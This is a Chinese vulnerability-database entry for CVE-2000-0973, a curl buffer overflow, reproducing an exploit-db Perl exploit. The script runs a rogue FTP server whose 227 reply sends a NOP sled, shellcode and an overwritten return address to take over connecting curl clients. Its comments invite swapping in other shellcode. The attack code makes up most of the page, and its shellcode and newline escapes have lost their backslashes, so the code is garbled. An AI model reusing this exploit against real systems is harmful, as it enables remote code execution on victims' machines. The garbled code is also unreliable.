curl缓冲区溢出漏洞

curl缓冲区溢出漏洞

漏洞ID 1106043 漏洞类型 缓冲区溢出
发布时间 2000-10-13 更新时间 2005-05-02
图片[1]-curl缓冲区溢出漏洞-安全小百科CVE编号 CVE-2000-0973
图片[2]-curl缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200012-172
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/20293
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-172
|漏洞详情
curl6.0-1.1之前版本以及curl-ssl6.0-1.2之前版本存在缓冲区溢出漏洞。远程攻击者可以通过强制产生超长错误信息执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1804/info
 
Curl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release).
 
Note that cURL runs on other platforms as well, and earlier versions may be also vulnerable.
 
Curl's error-logging feature improperly tests the size of generated error messages, which are sent from a remote host. A malicious remote server could send a maliciously-formed response to a request from curl, designed to exceed the maximum length of the error buffer. The contents of this oversized buffer, when copied onto the stack, can potentially overwrite the calling functions' return address. This can alter the program's flow of execution and result in arbitrary code being run on the client host.

#!/usr/bin/perl
#
# Remote linux cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://safemode.org && http://www.snosoft.com)
# 
# This exploit, which has been tested to work with cURL 6.4, 7.2 and 7.3,  
# may only be used for testing purposes. Additionally, the author does not 
# take any resposibilities for abuse of this file. More information about  
# the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write "Owned by a cURL ;)" to the file /tmp/0wned.txt
# You can replace it with whatever you want but be warned: due to buffer 
# manipilation working shellcode might be altered.
#
# A FreeBSD version is also available on safemode.org

use IO::Socket;
use Net::hostent;

$shellcode = # does a open() write() close() and exit(). 
        "xebx40x5ex31xc0x88x46x0exc6x46x21x09xfex46x21".
        "x88x46x22x8dx5ex0fx89x5ex23xb0x05x8dx1ex66xb9".
        "x42x04x66xbaxe4x01xcdx80x89xc3xb0x04x8bx4ex23".
        "x66xbax0fx27x66x81xeaxfcx26xcdx80xb0x06xcdx80".
        "xb0x01x31xdbxcdx80xe8xbbxffxffxffx2fx74x6dx70".
        "x2fx30x77x6ex65x64x2ex74x78x74x23x30x77x6ex65".
        "x64x20x62x79x20x61x20x63x55x52x4cx20x3bx29";

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-p/ && do { $port = shift; };
    /^-l/ && do { $list = 1; };
    /^-o/ && do { $offset = shift; };
}


$id     = `id -u`; chop($id);
$size   =  249;
$esp    =  0xbffff810;
$offset =  -150 unless $offset;
$port   =  21 unless $port;

if(!$list || $port > 1024 && $id != 0) {

print <<"TWENTE";

   Usage :  $0 -l 
   Option:  $0 -p <port to listen on>
   Option:  $0 -o <offset>

   Note: low ports require root privileges

TWENTE
exit;

}

for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {
    $buffer .= "x90";
}

$buffer .= "$shellcode";
$buffer .= pack('l', ($esp + $offset)); 

print("Listening on port $port. We are using return address: 0x", sprintf('%lx',($esp - $offset)), "n");

my $sock = new IO::Socket::INET (
                                 LocalPort => $port,
                                 Proto => 'tcp',
                                 Listen => 1,
                                 Reuse => 1,
                                );
die "Could not create socket: $!n" unless $sock;

while($cl = $sock->accept()) {

   $hostinfo = gethostbyaddr($cl->peeraddr);
   printf "[Received connect from %s]n", $hostinfo->name || $cl->peerhost;
   print $cl "220 Safemode.org FTP server (Version 666) ready.n";
   print $cl "230 Okn";
   print $cl "227 $buffern";
   sleep 2;

}
|参考资料

来源:XF
名称:curl-error-bo
链接:http://xforce.iss.net/static/5374.php
来源:BID
名称:1804
链接:http://www.securityfocus.com/bid/1804
来源:REDHAT
名称:RHBA-2000:092-01
链接:http://archives.neohapsis.com/archives/bugtraq/2000-10/0331.html
来源:FREEBSD
名称:FreeBSD-SA-00:72
链接:ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:72.curl.asc

相关推荐: Network Intrusion Detection System CVE-1999-0602 Remote Security Vulnerability

Network Intrusion Detection System CVE-1999-0602 Remote Security Vulnerability 漏洞ID 1208777 漏洞类型 Failure to Handle Exceptional Con…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享